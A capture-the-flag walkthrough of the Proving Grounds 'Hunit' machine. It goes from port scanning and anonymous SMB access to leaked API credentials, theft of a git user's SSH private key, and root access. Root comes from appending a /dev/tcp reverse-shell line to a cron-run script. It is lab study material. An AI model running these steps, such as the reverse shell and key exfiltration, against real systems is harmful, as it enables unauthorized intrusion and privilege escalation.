Hunit
Exploitation guide for Hunit | Proving Grounds
Last updated
Was this helpful?
Exploitation guide for Hunit | Proving Grounds
Last updated
Was this helpful?
In this walkthrough. We will get the ssh access to low privileged user by exploiting insecure api endpoint in web application which discloses sensitive information. Then we will get the private ssh key to git user which has privileges to push updates to master branch. We will edit cronjob with the help of private ssh key to get the reverse shell.
# FUll TCP scan
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ nmap $ip -p- -T4 -vv -Pn
PORT STATE SERVICE REASON
4045/tcp closed lockd conn-refused
8080/tcp open http-proxy syn-ack
12445/tcp open unknown syn-ack
17466/tcp closed unknown conn-refused
18030/tcp open unknown syn-ack
25310/tcp closed unknown conn-refused
27045/tcp closed unknown conn-refused
29433/tcp closed unknown conn-refused
43022/tcp open unknown syn-ack
44376/tcp closed unknown conn-refused
46399/tcp closed unknown conn-refused
51704/tcp closed unknown conn-refused
56463/tcp closed unknown conn-refused
57098/tcp closed unknown conn-refused
# Detailed Scan on Open ports
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ nmap $ip -p8080,12445,18030,43022 -sVCT -oN nmapTCP.txt -Pn
PORT STATE SERVICE VERSION
8080/tcp open http-proxy
. . .
|_http-title: My Haikus
12445/tcp open netbios-ssn Samba smbd 4.6.2
18030/tcp open http Apache httpd 2.4.46 ((Unix))
. . .
43022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
. . .┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient -L \\$ip -U "" -N -p 12445
Sharename Type Comment
--------- ---- -------
Commander Disk Dademola Files
IPC$ IPC IPC Service (Samba 4.13.2)
SMB1 disabled -- no workgroup available
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient '//192.168.245.125/commander' -p 12445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Nov 6 13:11:27 2020
.. D 0 Fri Jan 15 12:58:49 2021
25_tailrec_function.kt N 479 Fri Nov 6 13:11:16 2020
30_abstract_class.kt N 822 Fri Nov 6 13:11:16 2020
48_lazy_keyword.kt N 861 Fri Nov 6 13:11:16 2020
24_infix_function.kt N 528 Fri Nov 6 13:11:16 2020
. . .Anonymous login is enabled. There is bunch of files.
2 http service is running on the system ( port 8080 & 18030) .
Note: I tried fuzzing directories but found nothing.
Niktoalso found nothing to take note of.
Looking at the source code of articles we will find a comment with api endpoint.
Sending request to /api/ will give us following response.
Now send another request to /api/user/.
{
"login":"dademola",
"password":"<password_redacted>",
"firstname":"Derik",
"lastname":"Ademola",
"description":"Admin",
"id":6
},We will get a response with bunch of information which contains username and password. Among them we have one user with admin privileges. We will use that credential to login to ssh.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ ssh dademola@192.168.245.125 -p 43022
dademola@192.168.245.125's password:
[dademola@hunit ~]$ whoami
dademola
[dademola@hunit ~]$ ls
blog.jar local.txt shared
[dademola@hunit ~]$ cat local.txt
3cd0<...Redacted...>f2a727
There is a backup file for a crontab which gives us information about cronjob which are running every 3 & 2 minutes as a root.
[dademola@hunit ~]$ cat /etc/crontab.bak
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh
We find ssh keys in home folder of git user.
[dademola@hunit ~]$ cd ../git/
[dademola@hunit git]$ ls
git-shell-commands
[dademola@hunit git]$ ls -la
total 28
drwxr-xr-x 4 git git 4096 Nov 5 2020 .
drwxr-xr-x 4 root root 4096 Nov 5 2020 ..
-rw------- 1 git git 0 Jan 15 2021 .bash_history
-rw-r--r-- 1 git git 21 Aug 9 2020 .bash_logout
-rw-r--r-- 1 git git 57 Aug 9 2020 .bash_profile
-rw-r--r-- 1 git git 141 Aug 9 2020 .bashrc
drwxr-xr-x 2 git git 4096 Nov 5 2020 .ssh
drwxr-xr-x 2 git git 4096 Nov 5 2020 git-shell-commands
[dademola@hunit git]$ cd .ssh/
[dademola@hunit .ssh]$ ls
authorized_keys id_rsa id_rsa.pub
We will copy id_rsa to shared folder which can be accessed by smb.
[dademola@hunit .ssh]$ cp id_rsa ../../dademola/shared/Now download the file in your local machine and change permission of the key.
┌──(imtodess㉿deathnote)-[~/oscp/boxes/pg/hunit]
└─$ smbclient '//192.168.245.125/commander' -p 12445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> get id_rsa
getting file \id_rsa of size 2590 as id_rsa (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> exit
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/loot]
└─$ chmod 600 id_rsa Using the private ssh we can login to restricted git shell.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/loot]
└─$ ssh -i id_rsa git@192.168.245.125 -p 43022 255 ⨯
Last login: Tue Aug 24 12:30:40 2021 from 192.168.49.245
git> Clone the repo to your machine.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hunit/exploits] [12/157]
└─$ GIT_SSH_COMMAND='ssh -i ../loot/id_rsa -p 43022' git clone git@192.168.254.125:/git-server
Cloning into 'git-server'...
remote: Enumerating objects: 12, done.
remote: Counting objects: 100% (12/12), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 12 (delta 2), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (12/12), done.
Resolving deltas: 100% (2/2), done. Add the following reverse shell payload to script and make it executable.
# edit ip and port according to your need
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ echo "sh -i >& /dev/tcp/192.168.49.154/18030 0>&1" >> backups.sh
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ chmod +x backups.sh Now just push the commit to master branch.
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ git add -A
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ git commit -m "PE"
[master f4a83c4] PE
1 file changed, 1 insertion(+)
mode change 100644 => 100755 backups.sh
┌──(imtodess㉿deathnote)-[~/…/pg/hunit/exploits/git-server]
└─$ GIT_SSH_COMMAND='ssh -i ../../loot/id_rsa -p 43022' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 373 bytes | 373.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
To 192.168.245.125:/git-server
b50f4e5..f4a83c4 master -> master
After 5 minutes we will have the shell as root.
